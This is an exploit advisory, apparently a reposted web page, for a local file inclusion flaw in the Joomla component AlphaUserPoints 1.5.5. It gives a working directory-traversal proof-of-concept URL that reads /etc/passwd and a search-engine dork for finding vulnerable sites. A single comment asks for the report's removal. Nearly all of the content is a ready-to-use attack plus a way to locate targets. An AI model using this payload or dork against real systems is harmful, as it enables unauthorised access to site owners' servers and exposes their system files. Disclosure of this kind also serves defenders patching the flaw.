Joomla Component AlphaUserPoints LFI Vuln

[o] Joomla Component AlphaUserPoints Local File Inclusion Vulnerability
Software : com_alphauserpoints version 1.5.5
Vendor : http://www.alphaplug.com/
Author : AntiSecurity [ Vrs-hCk NoGe OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/


[o] Exploit
http://localhost/[path]/index.php?option=com_alphauserpoints&view=[LFI]


[o] PoC
http://localhost/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd


[o] Dork
inurl:"com_alphauserpoints"


One Response so far.

  1. We would be grateful if you remove the report from your website.